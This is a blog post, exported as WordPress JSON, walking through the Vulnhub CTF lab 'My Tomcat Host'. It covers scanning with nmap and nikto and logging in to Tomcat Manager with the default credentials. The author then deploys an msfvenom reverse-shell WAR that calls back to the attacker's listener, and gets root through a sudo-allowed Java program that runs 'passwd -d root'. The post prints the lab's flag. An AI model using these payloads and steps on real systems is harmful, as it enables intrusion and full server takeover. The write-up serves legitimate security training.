{"id":25994,"date":"2020-04-09T13:43:21","date_gmt":"2020-04-09T08:13:21","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25994"},"modified":"2020-04-09T18:34:07","modified_gmt":"2020-04-09T13:04:07","slug":"my-tomcat-host-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/","title":{"rendered":"My Tomcat Host Vulnhub Walkthrough"},"content":{"rendered":"
Hello everyone. This time I am sharing the walkthrough of a CTF machine designed by Akanksha Verma. This is a quick walkthrough of the Vulnhub machine My Tomcat Host. You can find this box on Infosec Warrior. According to the author it is a medium (intermediate) level machine with a good privilege escalation. So here we go.<\/p>\n To scan the network and obtain the IP address of the box I used netdiscover, as shown below.<\/p>\n So the IP of the box is 192.168.2.15. Let's start with an Nmap scan.<\/p>\n We can see that port 8080 is open, so let us have a look there.<\/p>\n Good, there is a Tomcat host on the box. For more information, I fired nikto.<\/p>\n Out of all the findings, the most important to us is that we have default credentials for the Tomcat Manager application, tomcat:tomcat, and the \/manager\/html page.<\/p>\n Once logged in to the manager we found that there is a .war file upload option. So without wasting time I used msfvenom to generate a reverse-shell .war file, where LHOST is the listener host IP and LPORT is the listener port.<\/p>\n With the payload ready, we are all set to launch the attack. Upload the generated .war file and call it from the browser while the listener is running on our machine.<\/p>\n We got a shell as the user tomcat.<\/p>\n First I upgraded the shell to an interactive shell and checked the sudo permissions of the user:<\/p>\n I see that we can run the java command with sudo privileges. You can find a program for this anywhere; I got it on Stack Overflow.<\/p>\n Now I compile the code and execute it.<\/p>\n Boom !!! Eureka !!! I got root, and here is the flag.<\/p>\n","protected":false},"excerpt":{"rendered":" Hello everyone. 
This time I am sharing the walkthrough of a CTF machine designed by Akanksha Verma. This is a…<\/p>\n","protected":false},"author":1,"featured_media":25996,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[121,118,122],"yoast_head":"\n<\/strong><\/h3>\n
Methodology applied:<\/strong><\/h3>\n
Network Scanning<\/h5>\n
Enumeration<\/h5>\n
Privilege escalation<\/h5>\n
Network Scanning<\/h3>\n
#netdiscover -i vboxnet0\r\n\tCurrently scanning: 192.168.18.0\/16 | Screen View: Unique Hosts \r\n\t2 Captured ARP Req\/Rep packets, from 2 hosts. Total size: 102 \r\n\t_____________________________________________________________________________\r\n\t IP At MAC Address Count Len MAC Vendor \/ Hostname \r\n\t-----------------------------------------------------------------------------\r\n\t192.168.2.2 08:00:27:a8:2f:81 1 42 PCS Systemtechnik GmbH \r\n\t192.168.2.15 08:00:27:f7:24:84 1 60 PCS Systemtechnik GmbH<\/pre>\n
#nmap -p- -A -O 192.168.2.15\r\n\tStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-09 09:52 IST\r\n\tNmap scan report for 192.168.2.15\r\n\tHost is up (0.00044s latency).\r\n\tNot shown: 65533 filtered ports\r\n\tPORT STATE SERVICE VERSION\r\n\t22\/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)\r\n\t| ssh-hostkey: \r\n\t| 2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)\r\n\t| 256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)\r\n\t|_ 256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)\r\n\t8080\/tcp open http Apache Tomcat 9.0.31\r\n\t|_http-favicon: Apache Tomcat\r\n\t|_http-title: Apache Tomcat\/9.0.31\r\n\tMAC Address: 08:00:27:F7:24:84 (Oracle VirtualBox virtual NIC)\r\n\tDevice type: general purpose\r\n\tRunning: Linux 3.X|4.X\r\n\tOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\r\n\tOS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9\r\n\tNetwork Distance: 1 hop\r\n\tTRACEROUTE\r\n\tHOP RTT ADDRESS\r\n\t1 0.44 ms 192.168.2.15\r\n<\/pre>\n
Enumeration:<\/h3>\n
#nikto -h http:\/\/192.168.2.15:8080\r\n\t\r\n\t- Nikto v2.1.6\r\n\t---------------------------------------------------------------------------\r\n\t+ Target IP: 192.168.2.15\r\n\t+ Target Hostname: 192.168.2.15\r\n\t+ Target Port: 8080\r\n\t+ Start Time: 2020-04-09 09:54:21 (GMT5.5)\r\n\t---------------------------------------------------------------------------\r\n\t+ Server: No banner retrieved\r\n\t+ The anti-clickjacking X-Frame-Options header is not present.\r\n\t+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n\t+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\r\n\t+ No CGI Directories found (use '-C all' to force check all possible dirs)\r\n\t+ OSVDB-39272: \/favicon.ico file identifies this app\/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community\r\n\t+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS \r\n\t+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.\r\n\t+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.\r\n\t+ \/examples\/servlets\/index.html: Apache Tomcat default JSP pages present.\r\n\t+ OSVDB-3720: \/examples\/jsp\/snp\/snoop.jsp: Displays information about page retrievals, including other users.\r\n\t+ \/axis2\/axis2-web\/HappyAxis.jsp: Apache Axis2 Happiness Page identified which includes internal application details.\r\n\t+ Default account found for 'Tomcat Manager Application' at \/manager\/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.\r\n\t+ \/host-manager\/html: Default Tomcat Manager \/ Host Manager interface found\r\n\t+ \/manager\/html: Tomcat Manager \/ Host Manager interface found (pass protected)\r\n\t+ \/axis2\/services\/Version\/getVersion: Apache Axis2 version identified.\r\n\t+ \/axis2\/services\/listServices: Apache Axis2 WebServices identified.\r\n\t+ \/axis2\/axis2-web\/index.jsp: Apache Axis2 Web Application identified.\r\n\t+ \/host-manager\/status: Default Tomcat Server Status interface found\r\n\t+ \/manager\/status: Tomcat Server Status interface found (pass protected)\r\n\t+ 8041 requests: 0 error(s) and 18 item(s) reported on remote host\r\n\t+ End Time: 2020-04-09 09:55:13 (GMT5.5) (52 seconds)\r\n\t---------------------------------------------------------------------------\r\n\t+ 1 host(s) tested<\/pre>\n
#msfvenom -p java\/jsp_shell_reverse_tcp LHOST=192.168.2.1 LPORT=1505 -f war > armour.war\r\n\t\r\n\tPayload size: 1106 bytes\r\n\tThe final size of war file: 1106 bytes<\/pre>\n
#nc -nlvp 1505\r\n\t\r\n\tlistening on [any] 1505 ...\r\n \tconnect to [192.168.2.1] from (UNKNOWN) [192.168.2.15] 57094\r\n\tid\r\n\tuid=998(tomcat) gid=997(tomcat) groups=997(tomcat)\r\n\thostname\r\n\tmy_tomcat\r\n\twhoami\r\n\ttomcat<\/pre>\n
Privilege Escalation:<\/h3>\n
sh-4.2$ id\r\n\tuid=998(tomcat) gid=997(tomcat) groups=997(tomcat)\r\n\tsh-4.2$ sudo -l\r\n\tMatching Defaults entries for tomcat on this host:\r\n\t requiretty, !visiblepw, always_set_home, env_reset, env_keep=\"COLORS\r\n\t DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1\r\n\t PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\", env_keep+=\"LC_COLLATE\r\n\t LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY\r\n\t LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL\r\n\t LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\",\r\n\t secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\r\n\r\n\tUser tomcat may run the following commands on this host:\r\n\t (ALL) NOPASSWD:\r\n\t \/usr\/lib\/jvm\/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64\/jre\/bin\/java<\/pre>\n
import java.io.BufferedReader;\r\n\timport java.io.InputStreamReader;\r\n\r\n\tpublic class armour { \/\/the class name has to match the file name (armour.java)\r\n\t public static void main(String args[]) {\r\n\t String s;\r\n\t Process p;\r\n\t try {\r\n\t p = Runtime.getRuntime().exec(\"passwd -d root\"); \/\/the command you want to execute\r\n\t BufferedReader br = new BufferedReader(\r\n\t new InputStreamReader(p.getInputStream()));\r\n\t while ((s = br.readLine()) != null)\r\n\t System.out.println(\"line: \" + s);\r\n\t p.waitFor();\r\n\t System.out.println (\"exit: \" + p.exitValue());\r\n\t p.destroy();\r\n\t } catch (Exception e) {}\r\n\t }\r\n\t}<\/pre>\n
bash-4.2$ javac armour.java\r\n\tbash-4.2$ sudo java armour\r\n\tline: Removing password for user root.\r\n\tline: passwd: Success\r\n\texit: 0\r\n\tbash-4.2$ su root\r\n\t[root@my_tomcat tmp]# id \r\n\tuid=0(root) gid=0(root) groups=0(root)\r\n\t[root@my_tomcat tmp]# hostname \r\n\tmy_tomcat\r\n\t[root@my_tomcat tmp]# whoami \r\n\troot\r\n\t[root@my_tomcat tmp]# uname -a\r\n\tLinux my_tomcat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU\/Linux\r\n\t[root@my_tomcat tmp]# cd \/root\/\r\n\t[root@my_tomcat ~]# ls\r\n\tproof.txt\r\n\t[root@my_tomcat ~]# cat proof.txt \r\n\tBest of Luck\r\n\t628435356e49f976bab2c04948d22fe4\r\n\t[root@my_tomcat ~]#<\/pre>\n